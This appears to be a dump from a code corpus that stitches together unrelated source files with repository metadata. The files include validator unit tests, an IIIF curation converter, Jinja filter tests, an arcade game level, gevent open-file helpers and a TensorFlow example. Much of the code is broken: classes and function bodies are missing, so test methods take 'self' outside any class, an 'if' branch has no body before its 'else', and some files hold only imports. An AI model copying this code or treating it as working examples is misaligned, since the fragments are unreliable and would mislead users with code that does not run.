] | 7 | 2020-03-03T18:09:48.000Z | 2022-03-23T16:55:26.000Z | src/template_config.py | ckaestne/toxicity-detector | bb00ffe4470c6c1a2f561212d487d56eab5a5da7 | [
"MIT"
] | 67 | 2020-06-09T23:57:49.000Z | 2022-02-05T19:09:49.000Z | src/template_config.py | sophieball/toxicity-detector | 7c07c5e6a6915428fdae64cbd3bc07caa697774e | [
"MIT"
] | 6 | 2020-02-21T00:19:57.000Z | 2022-03-03T23:00:42.000Z | mongo = { "user": "", "passwd": "", "db": "ghtorrent" }
perspective_api_key = ""
| 27 | 55 | 0.555556 |
fe8c212fdb626e028311eb927a139fd3cc7bba51 | 1,455 | py | Python | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | 1 | 2018-10-29T12:54:44.000Z | 2018-10-29T12:54:44.000Z | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| 45.46875 | 120 | 0.808935 |
fe8d5aa19fb8f623818fa75491db0f6d028311d8 | 3,203 | py | Python | Optimisation Portfolios/HERC.py | BrandonAFong/Ideas | 5d38be2dfaba12a534220e3f28a6c9da9aefcdec | [
"MIT"
] | null | null | null | Optimisation Portfolios/HERC.py | BrandonAFong/Ideas | 5d38be2dfaba12a534220e3f28a6c9da9aefcdec | [
"MIT"
] | null | null | null | Optimisation Portfolios/HERC.py | BrandonAFong/Ideas | 5d38be2dfaba12a534220e3f28a6c9da9aefcdec | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
#Dataframe of returns
| 28.345133 | 84 | 0.609429 |
fe8e1c215219c1805761ef6232ba7b858bfbd7b4 | 3,641 | py | Python | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | 3 | 2020-04-21T11:36:10.000Z | 2022-02-01T00:46:59.000Z | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | 17 | 2021-01-08T17:20:38.000Z | 2021-06-29T05:55:47.000Z | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | null | null | null | import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
| 31.938596 | 106 | 0.355397 |
fe8e3a04a382b9b727449826066c850475d83dbe | 190 | py | Python | programme.py | GaLaXy102/Vacationing | e476f1047deeca8f68897a497716319afab3e7f0 | [
"MIT"
] | null | null | null | programme.py | GaLaXy102/Vacationing | e476f1047deeca8f68897a497716319afab3e7f0 | [
"MIT"
] | null | null | null | programme.py | GaLaXy102/Vacationing | e476f1047deeca8f68897a497716319afab3e7f0 | [
"MIT"
] | null | null | null | from lib import get_itineraries
import data
if __name__ == '__main__':
for itinerary in get_itineraries(data.sicily):
print("#" * 24)
print(itinerary)
print("")
| 21.111111 | 50 | 0.636842 |
fe908006796adb02dbc2aa1b3ab9fa0ac75b1812 | 5,574 | py | Python | sawyer/mujoco/tasks/transition_pick_and_place_task.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | sawyer/mujoco/tasks/transition_pick_and_place_task.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | sawyer/mujoco/tasks/transition_pick_and_place_task.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
| 28.880829 | 121 | 0.571582 |
fe90ddd8fb4cfe4289850e4b9709b973ed6310cd | 36,485 | py | Python | tests/app/test_jinja_filters.py | nealedj/eq-survey-runner | b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34 | [
"MIT"
] | null | null | null | tests/app/test_jinja_filters.py | nealedj/eq-survey-runner | b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34 | [
"MIT"
] | 1 | 2018-11-05T12:00:51.000Z | 2018-11-05T12:00:51.000Z | tests/app/test_jinja_filters.py | nealedj/eq-survey-runner | b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34 | [
"MIT"
] | null | null | null | # coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset
('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous sunday with +1 month offset, back to input
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for case in test_cases:
self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
| 38.005208 | 143 | 0.615952 |
fe90eb5d4db9dcb42eabad6cf0007baab0fc7833 | 18,598 | py | Python | levels/sombie.py | superhasduper/PythonGames | 64995d3e0b619006a2cf80d0da3c0fdf97db6fd9 | [
"MIT"
] | 1 | 2019-07-07T19:55:39.000Z | 2019-07-07T19:55:39.000Z | levels/sombie.py | superhasduper/PythonGames | 64995d3e0b619006a2cf80d0da3c0fdf97db6fd9 | [
"MIT"
] | null | null | null | levels/sombie.py | superhasduper/PythonGames | 64995d3e0b619006a2cf80d0da3c0fdf97db6fd9 | [
"MIT"
] | null | null | null | import arcade
import os
SPRITE_SCALING = 0.5
SPRITE_NATIVE_SIZE = 128
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = SPRITE_SIZE * 14
SCREEN_HEIGHT = SPRITE_SIZE * 10
MOVEMENT_SPEED = 5
COIN_SCALE = 0.7
def setup_room_1():
"""
Create and return room 1.
If your program gets large, you may want to separate this into different
files.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.wall_list = arcade.SpriteList()
room.door_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up on the right side
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
if not (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x == 0:
door = arcade.Sprite("fence.png", SPRITE_SCALING)
door.left = x
door.bottom = y
room.door_list.append(door)
wall = arcade.Sprite("gravel_dirt.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 5 * SPRITE_SIZE
room.wall_list.append(wall)
# If you want coins or monsters in a level, then add that code here.
# Load the background image for this level.
room.background = arcade.load_texture("g.png")
for i in range(300,600,75):
coin = arcade.Sprite("coin.png",COIN_SCALE)
coin.center_x = i
coin.center_y = 500
room.coin_list.append(coin)
smallpotion = arcade.Sprite("big.png",0.05)
smallpotion.center_x = 100
smallpotion.center_y = 900
room.smallpotion_list.append(smallpotion)
return room
def setup_room_2():
"""
Create and return room 2.
"""
room = Room()
""" Set up the game and initialize the variables. """
# Sprite lists
room.door_list = arcade.SpriteList()
room.wall_list = arcade.SpriteList()
room.coin_list = arcade.SpriteList()
room.smallpotion_list = arcade.SpriteList()
room.bigpotion_list = arcade.SpriteList()
# -- Set up the walls
# Create bottom and top row of boxes
# This y loops a list of two, the coordinate 0, and just under the top of window
for y in (0, SCREEN_HEIGHT - SPRITE_SIZE):
# Loop for each box going across
for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
# Create left and right column of boxes
for x in (0, SCREEN_WIDTH - SPRITE_SIZE):
# Loop for each box going across
for y in range(SPRITE_SIZE, SCREEN_HEIGHT - SPRITE_SIZE, SPRITE_SIZE):
# Skip making a block 4 and 5 blocks up
if (y != SPRITE_SIZE * 4 and y != SPRITE_SIZE * 5) or x != 0:
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = x
wall.bottom = y
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 6 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 1 * SPRITE_SIZE
wall.bottom = 3 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 2 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 3 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 5 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 4 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom =3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 0.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 6 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 7 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 1.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 2.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 3.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 4.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 5.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 10 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 9 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 6.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 7.5 * SPRITE_SIZE
room.wall_list.append(wall)
wall = arcade.Sprite("stone_snow.png", SPRITE_SCALING)
wall.left = 8 * SPRITE_SIZE
wall.bottom = 8 * SPRITE_SIZE
room.wall_list.append(wall)
room.background = arcade.load_texture("g.png")
bigpotion = arcade.Sprite("small.png",0.05)
bigpotion.center_x = 800
bigpotion.center_y = 100
room.bigpotion_list.append(bigpotion)
return room
def main():
""" Main method """
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
arcade.run()
if __name__ == "__main__":
main() | 36.324219 | 124 | 0.614367 |
fe916e74f3d8c5dd73c18e07f1aa14f15ee3d8d0 | 4,869 | py | Python | venv/lib/python3.6/site-packages/gevent/testing/openfiles.py | Guillaume-Fernandez/phishfinder | b459a30202fd5dfb1340b43c70363705de7cedd9 | [
"MIT"
] | 10 | 2021-03-23T03:46:19.000Z | 2022-03-08T07:20:25.000Z | venv/lib/python3.6/site-packages/gevent/testing/openfiles.py | Guillaume-Fernandez/phishfinder | b459a30202fd5dfb1340b43c70363705de7cedd9 | [
"MIT"
] | 7 | 2021-05-21T16:51:48.000Z | 2022-03-12T00:50:26.000Z | venv/lib/python3.6/site-packages/gevent/testing/openfiles.py | Guillaume-Fernandez/phishfinder | b459a30202fd5dfb1340b43c70363705de7cedd9 | [
"MIT"
] | 4 | 2021-04-21T00:49:34.000Z | 2021-11-21T09:18:29.000Z | # Copyright (c) 2018 gevent community
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import os
import unittest
import re
from . import sysinfo
# Linux/OS X/BSD platforms can implement this by calling out to lsof
if sysinfo.WIN:
else:
lsof_get_open_files = default_get_open_files
try:
# psutil import subprocess which on Python 3 imports selectors.
# This can expose issues with monkey-patching.
import psutil
except ImportError:
get_open_files = default_get_open_files
get_number_open_files = default_get_number_open_files
else:
# If psutil is available (it is cross-platform) use that.
# It is *much* faster than shelling out to lsof each time
# (Running 14 tests takes 3.964s with lsof and 0.046 with psutil)
# However, it still doesn't completely solve the issue on Windows: fds are reported
# as -1 there, so we can't fully check those.
def get_open_files():
"""
Return a list of popenfile and pconn objects.
Note that other than `fd`, they have different attributes.
.. important:: If you want to find open sockets, on Windows
and linux, it is important that the socket at least be listening
(socket.listen(1)). Unlike the lsof implementation, this will only
return sockets in a state like that.
"""
results = dict()
process = psutil.Process()
results['data'] = process.open_files() + process.connections('all')
for x in results['data']:
results[x.fd] = x
results['data'] += ['From psutil', process]
return results
| 38.642857 | 139 | 0.657835 |
fe93e83fe7e8770b4f2c1e2cf97bec6cd0abb158 | 1,628 | py | Python | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | 5 | 2016-07-27T08:25:17.000Z | 2022-02-07T19:41:45.000Z | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | null | null | null | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | 1 | 2022-02-07T19:41:46.000Z | 2022-02-07T19:41:46.000Z | '''
marathon_example.py
performs a simple matrix multiply using 3 compute nodes
'''
if __name__ == '__main__':
from sys import argv
import tensorflow as tf
from dtforchestrator import *
args = parseargs()
with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices:
with tf.device(tfdevices.getDeviceSpec(1)):
matrix1 = tf.constant([[3.],[3.]])
with tf.device(tfdevices.getDeviceSpec(2)):
matrix2 = tf.constant([[3.,3.]])
